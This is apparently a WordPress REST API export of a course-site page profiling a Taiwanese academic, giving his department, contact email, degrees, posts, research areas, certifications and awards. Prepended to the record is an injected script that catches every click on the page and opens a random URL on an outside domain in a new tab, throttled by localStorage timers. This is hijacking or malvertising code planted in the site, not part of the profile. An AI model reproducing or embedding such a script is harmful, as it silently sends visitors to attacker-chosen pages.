<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1499,"date":"2020-02-26T15:02:57","date_gmt":"2020-02-26T07:02:57","guid":{"rendered":"http:\/\/edu.secda.info\/chewei_course8\/?page_id=1499"},"modified":"2020-02-26T18:20:40","modified_gmt":"2020-02-26T10:20:40","slug":"%e6%8e%88%e8%aa%b2%e8%80%81%e5%b8%ab","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/chewei_course8\/?page_id=1499","title":{"rendered":"\u6388\u8ab2\u8001\u5e2b"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"1499\" class=\"elementor elementor-1499\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-708c506 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"708c506\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-985a39d\" data-id=\"985a39d\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8a8c68c elementor-widget elementor-widget-toggle\" data-id=\"8a8c68c\" data-element_type=\"widget\" data-widget_type=\"toggle.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-toggle\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1451\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1451\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u4ecb\u7d39<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1451\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1451\"><p style=\"padding-left: 40px;\"><span style=\"color: #000000;\"><strong>\u5f35\u54f2\u7dad\u535a\u58eb<\/strong><\/span><\/p><p style=\"padding-left: 40px;\"><span style=\"color: #000000;\">\u81fa\u7063\u9ad4\u80b2\u904b\u52d5\u5927\u5b78 \u4f11\u9592\u904b\u52d5\u7ba1\u7406\u5b78\u7cfb<\/span><\/p><p style=\"padding-left: 40px;\"><span style=\"color: #000000;\">chewei@gm.ntupes.edu.tw<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1452\" class=\"elementor-tab-title\" data-tab=\"2\" role=\"tab\" aria-controls=\"elementor-tab-content-1452\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u5b78\u6b77<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1452\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"2\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1452\"><p style=\"padding-left: 40px;\">\u9298\u50b3\u5927\u5b78\u7ba1\u7406\u7814\u7a76\u6240\u535a\u58eb<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1453\" class=\"elementor-tab-title\" data-tab=\"3\" role=\"tab\" aria-controls=\"elementor-tab-content-1453\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u7d93\u6b77<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1453\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"3\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1453\"><p style=\"padding-left: 40px;\">\u570b\u7acb\u81fa\u7063\u9ad4\u80b2\u904b\u52d5\u5927\u5b78 \u8cfd\u6703\u4e2d\u5fc3\u00a0 \u8cc7\u8a0a\u7d44\u7d44\u9577<\/p><p style=\"padding-left: 40px;\">\u570b\u7acb\u81fa\u7063\u9ad4\u80b2\u904b\u52d5\u5927\u5b78 \u8cfd\u6703\u4e2d\u5fc3 \u60c5\u641c\u7d44\u7d44\u9577<\/p><p style=\"padding-left: 40px;\">\u5143\u6676\u592a\u967d\u80fd\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8 \u5143\u6676\u5927\u5b78\u5802 \u54e1\u5de5\u8a13\u7df4\u9867\u554f<\/p><p style=\"padding-left: 40px;\">\u5143\u57f9\u91ab\u4e8b\u79d1\u6280\u5927\u5b78\u8cc7\u8a0a\u7ba1\u7406\u7cfb \u5c08\u4efb\u52a9\u7406\u6559\u6388\/\u526f\u6559\u6388<\/p><p style=\"padding-left: 40px;\">\u5143\u57f9\u91ab\u4e8b\u79d1\u6280\u5927\u5b78\u6578\u4f4d\u5275\u65b0\u7ba1\u7406\u7814\u7a76\u6240 \u5c08\u4efb\u526f\u6559\u6388<\/p><p style=\"padding-left: 40px;\">\u7a3b\u6c5f\u79d1\u6280\u66a8\u7ba1\u7406\u5b78\u9662 \u52d5\u756b\u904a\u6232\u8a2d\u8a08\u5b78\u7cfb\/\u884c\u52d5\u79d1\u6280\u5b78\u7cfb \u5c08\u4efb\u526f\u6559\u6388<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1454\" class=\"elementor-tab-title\" data-tab=\"4\" role=\"tab\" aria-controls=\"elementor-tab-content-1454\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u7814\u7a76\u9818\u57df<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1454\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"4\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1454\"><p style=\"padding-left: 40px;\">\u5927\u6578\u64da\u5206\u6790\u3001\u6c7a\u7b56\u79d1\u5b78\u3001\u4f9b\u61c9\u93c8\u7ba1\u7406\u3001\u6578\u91cf\u7814\u7a76\u65b9\u6cd5<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1455\" class=\"elementor-tab-title\" data-tab=\"5\" role=\"tab\" aria-controls=\"elementor-tab-content-1455\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u5c08\u696d\u8b49\u7167\u7a2e\u5b50\u8b1b\u5e2b<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1455\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"5\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1455\"><p style=\"padding-left: 40px;\">1. \u5143\u57f9\u79d1\u6280\u5927\u5b78\u5c08\u5229\u7a2e\u5b50\u6559\u5e2b\u8b49\u66f8\uff0c\u8b49\u66f8\u865f\u78bc\uff1a09802015\uff0c2009\/8\/1-2010\/7\/31.<\/p><p style=\"padding-left: 40px;\">2. TBSA\u5546\u52d9\u4f01\u5283\u80fd\u529b\u5206\u7d1a\u6aa2\u5b9a\u7a2e\u5b50\u6559\u5e2b\uff0cTBSA\u53f0\u7063\u5546\u52d9\u7b56\u5283\u5354\u6703\uff0c\u8b49\u7167\u865f\u78bc\uff1aT0900008\uff0c2009\/11\/1<\/p><p style=\"padding-left: 40px;\">3. SQL 2005\u8ab2\u7a0b\u8b1b\u5e2b\uff0c20100901<\/p><p style=\"padding-left: 40px;\">4. MOS PowerPoint\u570b\u969b\u8a8d\u8b49\u7a2e\u5b50\u6559\u5e2b\u7814\u7fd2\uff0c20130316<\/p><p style=\"padding-left: 40px;\">5. MOS Word\u570b\u969b\u8a8d\u8b49\u7a2e\u5b50\u6559\u5e2b\u7814\u7fd2\uff0c20130316<\/p><p style=\"padding-left: 40px;\">6. AutoCAD\u570b\u969b\u8a8d\u8b49\u7a2e\u5b50\u6559\u5e2b\u7814\u7fd2\uff0c20130323<\/p><p style=\"padding-left: 40px;\">7. Maya\u570b\u969b\u8a8d\u8b49\u7a2e\u5b50\u6559\u5e2b\u7814\u7fd2\uff0c20130330<\/p><p style=\"padding-left: 40px;\">8. 3ds Max \u570b\u969b\u8a8d\u8b49\u7a2e\u5b50\u6559\u5e2b\u7814\u7fd2\uff0c20130406<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1456\" class=\"elementor-tab-title\" data-tab=\"6\" role=\"tab\" aria-controls=\"elementor-tab-content-1456\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u69ae\u8b7d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1456\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"6\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1456\"><p style=\"padding-left: 40px;\">1. \u5fae\u6790\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8CRM\u7cfb\u7d71\u958b\u767c\u66a8\u8a8d\u8b49\u63a8\u5ee3\u9867\u554f\uff0c\u8b49\u66f8\u865f\u78bc\uff1aCRMMA 2009001849, 2009\/07\/11<\/p><p style=\"padding-left: 40px;\">2. TPMA \u767e\u5927\u540d\u5e2b\uff0c\u53f0\u7063\u5c08\u6848\u7ba1\u7406\u5b78\u6703\uff0c\u53f0\u5c08\u734e\u5b57\u7b2c980167\u865f\uff0c2009\/12\/06<\/p><p style=\"padding-left: 40px;\">3. 99\u5e74\u5ea6\u7d93\u6fdf\u90e8\u91d1\u5c6c\u4e2d\u5fc3\u5b78\u754c\u5354\u52a9\u4e2d\u5c0f\u4f01\u696d\u79d1\u6280\u95dc\u61f7\u8a08\u756b\u512a\u826f\u734e<\/p><p style=\"padding-left: 40px;\">4. Golden State University, 2010\u570b\u969b\u5091\u51fa\u767c\u660e\u5bb6\u535a\u5b78\u535a\u58eb\uff0c2010\/12\/15<\/p><p style=\"padding-left: 40px;\">5. \u570b\u969b\u5091\u51fa\u767c\u660e\u5bb6\u535a\u5b78\u535a\u58eb\uff0c2010\/12\/15<\/p><p style=\"padding-left: 40px;\">6. 2010\u570b\u969b\u5091\u51fa\u767c\u660e\u5bb6\u5b78\u8853\u570b\u5149\u734e\u7ae0\uff0c2010\/12\/15<\/p><p style=\"padding-left: 40px;\">7. 2010\u570b\u969b\u5091\u51fa\u767c\u660e\u5bb6\u734e\uff0c\u53f0\u5317\u5e02\u653f\u5e9c\uff0c2011\/01\/19<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u4ecb\u7d39 \u5f35\u54f2\u7dad\u535a\u58eb \u81fa\u7063\u9ad4\u80b2\u904b\u52d5\u5927\u5b78 \u4f11\u9592\u904b\u52d5\u7ba1\u7406\u5b78\u7cfb chewei@gm.ntu<\/p>\n","protected":false},"author":6,"featured_media":0,"parent":1463,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1499"}],"collection":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1499"}],"version-history":[{"count":24,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1499\/revisions"}],"predecessor-version":[{"id":1576,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1499\/revisions\/1576"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1463"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1499"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}